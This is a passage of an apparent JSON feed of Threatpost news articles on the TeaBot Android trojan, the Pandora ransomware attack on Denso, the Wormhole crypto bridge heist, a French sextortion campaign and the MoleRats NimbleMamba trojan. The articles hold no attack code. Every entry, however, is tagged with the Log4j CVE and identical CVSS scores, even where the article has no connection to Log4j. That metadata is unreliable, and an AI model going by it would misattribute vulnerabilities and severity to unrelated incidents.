Scanner.\n\n## Why Can\u2019t TeaBot Be Stopped?\n\nApp stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they\u2019re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.\n\nHowever, TeaBot droppers aren\u2019t obviously malicious. They might seem perfectly uninteresting, at least on the surface.\n\nOnce a user opens one of these nondescript apps, they\u2019re prompted to download a software update. The update is, in fact, a second app containing a malicious payload.\n\nIf the user gives their app permission to install software from an unknown source, the infection process begins. Like other Android malware, the TeaBot malware attempts to leverage Accessibility Services. [Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application \u2013 a remote access and desktop sharing tool \u2013 giving the bad actor behind the malware remote control over the victim\u2019s devices.\n\nThe ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device\u2019s screen, as well as to perform malicious actions on the device, the report said.\n\n## Here\u2019s How TeaBot _Can_ Be Stopped\n\nTeaBot attacks have grown fast. As Cleafy notes, \u201cIn less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.\u201d\n\nWhat can be done to stop them?\n\n\u201cReal-time scanning of app downloads \u2013 even if the app doesn\u2019t originate from Google Play \u2013 would help to mitigate this issue,\u201d Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that \u201cadditional warning messages when installing app add-ons that aren\u2019t on Google Play could be useful, too.\u201d\n\nLeo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that \u201cGoogle could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they\u2019re \u2018bad.'\u201d\n\nUntil app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. \u201cEveryone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn\u2019t be treated any differently.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T22:50:09", "type": "threatpost", "title": "TeaBot Trojan Haunts Google Play Store, Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-02T22:50:09", "id": "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "href": "https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T13:03:28", "description": "A multibillion supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the target of a cyberattack over the weekend \u2013 confirmation that came after the Pandora ransomware group began leaking data that attackers claimed was stolen in the incident.\n\nThe attack on Japan-based Denso occurred at a company office in Germany, which was \u201cillegally accessed by a third party on March 10,\u201d the company said in [a press statement](<https://www.denso.com/global/en/news/newsroom/2022/20220314-g01/>) on its website.\n\n\u201cAfter \u2026 detecting the unauthorized access, Denso promptly cut off the network connection of devices that received unauthorized access and confirmed that there is no impact on other Denso facilities,\u201d the company said in the statement.\n\nDenso is one of the world\u2019s largest suppliers of automotive components \u2013 including powertrain control and electronics parts \u2013 to top automobile brands such as Toyota, Mercedes-Benz, Ford, Honda, Volvo, Fiat and General Motors. The Japan-based supplier reported $44.6 billion in revenue last year and has more than 200 subsidiaries with 168,391 employees worldwide.\n\nDenso is currently investigating the incident with appropriate authorities and production continues at \u201call plants as usual,\u201d according to the statement.\n\n## **Toyota Data Leaked**\n\nHowever, classified information from Toyota stolen in the attack on Denso already has been leaked on the dark web by Pandora, according to Japanese security firm Mitsui Bussan Secure Directions.\n\nThe company told [Japanese news outlet NHK](<https://www3.nhk.or.jp/nhkworld/en/news/20220313_23/>) that Pandora posted a message on the dark web on Sunday afternoon, Japan time, claiming to have stolen more than 157,000 items amounting to 1.4 terabytes of data belonging to the Toyota Motor group. This is the second time in a few weeks that Toyota has been hit: In late February, the car maker was forced to [close down](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>) its Japan plants after a suspected cyberattack.\n\nOn Saturday, Eastern time, the dark-web criminal intelligence firm DarkTracer [tweeted](<https://twitter.com/darktracer_int/status/1502871181556211721?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1502871181556211721%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bankinfosecurity.com%2Ftoyota-parts-supplier-denso-confirms-ransomware-attack-a-18716>) a screenshot of the Denso listing on Pandora\u2019s leak portal. Reports said that the dump includes purchase orders, emails, non-disclosure agreements, technical drawings and other classified information.\n\n> [ALERT] Pandora gang has announced \"DENSO\" on the victim list. [pic.twitter.com/kh9wzGV1io](<https://t.co/kh9wzGV1io>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 13, 2022](<https://twitter.com/darktracer_int/status/1502871181556211721?ref_src=twsrc%5Etfw>)\n\nOn Monday, DarkTracer [added](<https://twitter.com/darktracer_int/status/1503521358436872193>) that the Rook gang listed Denso on its victim list a few months ago, in December 2021.\n\n> DENSO was listed on the victim list by ROOK in December 2021 and Pandora ransomware gang in March 2022. [pic.twitter.com/tFcRP0iSx3](<https://t.co/tFcRP0iSx3>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 15, 2022](<https://twitter.com/darktracer_int/status/1503521358436872193?ref_src=twsrc%5Etfw>)\n\nIt\u2019s unclear at this time if Pandora managed to encrypt files before the most recent attack was detected, nor how much, if any, ransom is being demanded, according to reports. The one-two punch of both encrypting files and then threatening to leak or actually leaking files is a known ransomware tactic dubbed [\u201cdouble extortion.\u201d](<https://threatpost.com/mount-locker-ransomware-changes-tactics/165559/>)\n\n## **Supply-Chain Under Attack**\n\nThe Denso attack is the second supply-chain cyber incident that has impacted Toyota this year. In February, [an attack on Toyota supplier Kojima Industries Corp](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>). forced the company to shut down its Japanese plants.\n\nThese incidents demonstrate the danger of attacks to the supply chain of multinational organizations, stressing the need to maintain and manage the same security at the principal company across all partners and business units, one security professional said.\n\n\u201cCybercriminals will always exploit the weakest link, and in today\u2019s interconnected networks can do significant damage from compromising even a small business unit,\u201d Chris Clements, vice president of solutions architecture at security firm [**Cerberus Sentinel**](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PafO3_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMJWuG5OA4-2BOZVBWk67VVuirlpGqvvjOXpBF3L7YyXmgDicFNnin5X9cffMU5tz5sAvRLImOfXwTT9u9-2FFH7xzyri9Y9AhWFE2dmrkAU8E2kn12zI2BdfTSHHXU9lg6mTJmz7yfpOLHFgsLlFN24bpzc1Kk4Xrvjw-2BEXtWSMBRNfWVwwirbw4h3nPn3SgKzb5aH5KhjDKycPmCLx4O3XW8D7pUZQ0iU5KLwWJv0SpW-2FM-3D>), wrote in an email to Threatpost on Monday. \u201cIt\u2019s no longer enough for businesses to solely focus on their ability to prevent or recover from a ransomware attack as attackers now routinely steal mass quantities of data as part of their operations.\u201d\n\nIndeed, the data theft involved in double-extortion attacks can be even more dangerous than simply a traditional encryption-based ransomware attack due to the unpredictability of attackers once they get their hands on sensitive and proprietary information, he noted.\n\n\u201cThere is no way to verify that the attacker will actually delete the information instead of attempting to resell it on the dark web or simply release it publicly,\u201d Clements said.\n\n## **Emerging Ransomware Threat**\n\nThe Pandora group is relatively new on the ransomware scene, emerging earlier this month as a new player in the threat landscape that uses this dangerous method of double extortion to blackmail targets.\n\nPandora\u2019s designers have developed the ransomware to encrypt sensitive files to restrict access by appending the _.pandora_ extension to filenames to prevent victims from opening affected files, according [to research](<https://malwarewarrior.com/how-to-remove-pandora-ransomware/>) from Malware Warrior.\n\nSince Pandora is such a new threat, it\u2019s not yet known how cybercriminals breach corporate networks to infect systems with the ransomware. However, clues might be found in previously active ransomware groups and their methods, researchers said.\n\nOne security researcher with the Twitter handle pancak3 [believes](<https://twitter.com/pancak3lullz/status/1503201831303983108>) Pandora is a re-branding of [Rook](<https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/>) ransomware, which in turn borrows code from [Babuk ransomware](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). That [now-defunct ransomware-as-a-service (RaaS)](<https://threatpost.com/babuk-ransomware-gang-mulls-retirement/165742/>) group \u2013 which is likely selling its services for other cybercriminals to use \u2013 also used double extortion in its attacks during its heyday.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T12:58:59", "type": "threatpost", "title": "Pandora Ransomware Hits Giant Automotive Supplier Denso", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T12:58:59", "id": "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "href": "https://threatpost.com/pandora-ransomware-hits-giant-automotive-supplier-denso/178911/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Wormhole \u2013 a web-based blockchain \u201cbridge\u201d that enables users to convert cryptocurrencies \u2013 said on Thursday that \u201call funds are safe\u201d after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).\n\nIn a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that \u201cthe attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.\u201d\n\nAs far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, \u201cWe noticed you were able to exploit the Solana VAA verification and mint tokens. We\u2019d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you\u2019ve minted. You can reach out to us at[ contact@certus.one](<https://t.nylas.com/t1/222/6go6zh11n354zj4gtfyydtk2j/0/7e3f0565dba6ac71abf6ccdb740c5697cd8db828b0852af88c0c054ee28bb3c2>).\u201d\n\nIts total on the heist differs a bit from that of Wormhole: CertiK\u2019s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.\n\nThis is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million. That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.\n\nIn an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.\n\n> 1/2\n> \n> All funds have been restored and Wormhole is back up.\n> \n> We're deeply grateful for your support and thank you for your patience.\n> \n> \u2014 Wormhole\ud83c\udf2a (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079?ref_src=twsrc%5Etfw>)\n\nWormhole\u2019s Portal \u2013 its token bridge \u2013 was back up as of 13:29 UTC, the team said.\n\n## A \u2018Rather Common\u2019 Programming Error\n\nRoger Grimes, data driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a \u201crather common\u201d programming error.\n\n\u201cThe function inside of the multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,\u201d he exlained via email. \u201cSo there was no integrity guaranteed in the integrity check. Yeah, that is a problem.\u201d\n\n## Why So Popular?\n\nCertiK said that the bridge\u2019s popularity meant that it had become the dominant bridge between Solana and Ethereum, \u201cand as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.\u201d\n\n020322 14:54 UPDATE: Added CertiK\u2019s analysis of Wormhole\u2019s 1:1 ratio of ETH to wETH. \n\nAs CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, \u201cacting essentially as an escrow service.\u201d But the theft broke that 1:1 peg, leading to what CertiK said was \u201cat least 93,750 less ETH held as collateral.\u201d\n\nIt didn\u2019t bode well for the financial health of Solana, the firm pointed out. If that ratio hadn\u2019t been regained, DeFi on Solana was at risk of \u201ca mass liquidation event,\u201d according to the its analysis.\n\nBut given that Wormhole on Thursday indicated that its backers \u2013 whoever they may be \u2013 had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored. \n\nAll well and good, but still, investors\u2019 gonads shrunk in response to the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.\n\nAt this point, the full extent of this attack \u201cstill remains to be seen,\u201d CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole\u2019s bridge to a different cryptocurrency \u2013 the Terra blockchain \u2013 shares the same vulnerability as its Solana bridge.\n\n## Who Bailed Out Wormhole?\n\nThe Wormhole team didn\u2019t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to \u201cmanage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.\u201d\n\n\u201cIt was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),\u201d suggested one Twitter user.\n\n> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)\n> \n> \u2014 ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956?ref_src=twsrc%5Etfw>)\n\nAlameda hasn\u2019t made a public statement on the matter. Wormhole has promised a detailed incident report as soon as possible.\n\n## Crypto\u2019s Cutting Edge Gets a Nasty Cut\n\nRonghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn\u2019t the first of its kind, and obviously, it won\u2019t be the last.\n\n\u201cWe saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,\u201d Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/#:~:text=Hackers%20have%20stolen%20%2480%20million,ever%2C%20DeFiYield%20Rekt%20data%20shows.>) by the DeFi protocol Qubit Finance on Friday.\n\nThe attackers reportedly made off with 206,809 Binance coins through Qubit\u2019s QBridge deposit function, making it the seventh-largest DeFi hack ever.\n\nExpect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. \u201cWe seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry\u2019s ability to build services securely,\u201d he told Threatpost via email.\n\nOf course, there\u2019s always the \u201cbecause that\u2019s where the money is\u201d rationale, Gu noted: \u201cBridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.\u201d\n\nThreat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: \u201cA lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.\u201d\n\n## A Need for Secure Development Lifecycle\n\nWhere there is software, there are bugs. Grimes pointed to the attack as being a case in point about the need for training in secure development lifecycle (SDL) coding. \u201cSDL teaches developers about common exploitable bugs and how to avoid putting it into their own code,\u201d he explained. \u201cIt teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.\u201d\n\nBut there\u2019s a bigger underlying problem, he noted: Namely, most developers and smart contract creators, aren\u2019t trained in SDL and \u201cget little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.\u201d\n\nOne thing to note is that the cryptocurrency world is full of trillions of dollars, but it\u2019s still at the toddler stage. \u201cIt is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,\u201d Grimes said.\n\nWhereas it\u2019s getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS, these platforms are maturing, making it tougher to pull them apart, he said. That includes the experienced coders, tools and the protective mechanisms of the operating systems themselves.\n\nNot so with the cryptocurrency world, Grimes said, which is the mirror opposite.\n\n\u201cIt is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,\u201d he observed.\n\nHe compared it to putting your door key in your potted plant in front of the door: \u201cSometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And viola, they are finding lots of exploitable bugs.\u201d\n\nAnd once the money\u2019s gone bye-bye, it\u2019s tough to claw it back. \u201cThe exploits always result in stolen money, which are hard to track to and [identify], and almost always impossible to reverse, even if you are watching it in real time,\u201d Grimes said.\n\nHe predicted that after suffering billions of dollars in pain, the cryptocurrency world \u201cwill mature and it will become harder for hackers to find the easy pickings.\u201d\n\nToo bad the lessons are so painful, Grimes said: \u201cYou always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T18:28:14", "type": "threatpost", "title": "Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T18:28:14", "id": "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "href": "https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[![Webinar Promo](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/18102902/keeper_1500x1500-300x300.jpg)](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-218x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:09", "description": "Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said.\n\nResearchers from Proofpoint said they have observed a spear-phishing campaign using multiple vectors since November that they believe is the work of TA402, more [commonly known as](<https://threatpost.com/molerats-apt-espionage-facebook-dropbox/162162/>) MoleRats and linked to the Palestinian Territories, according to a [report](<https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage>) posted online Tuesday.\n\nThe campaign uses various phishing lures and includes tactics not only to avoid being detected but also to ensure that its core malware payload only attacks specific targets, Proofpoint researchers wrote in the report. Some of the attacks observed by the team also delivered a secondary payload, a trojan dubbed BrittleBush, they said.\n\nNimbleMamba, delivered as an obfuscated .NET executable using third-party obfuscators, is an intelligence-gathering trojan researchers believe is a replacement for previous malware used by TA402, LastConn.\n\n\u201cNimbleMamba has the traditional capabilities of an intelligence-gathering trojan and is likely designed to be the initial access,\u201d researchers wrote. \u201cFunctionalities include capturing screenshots and 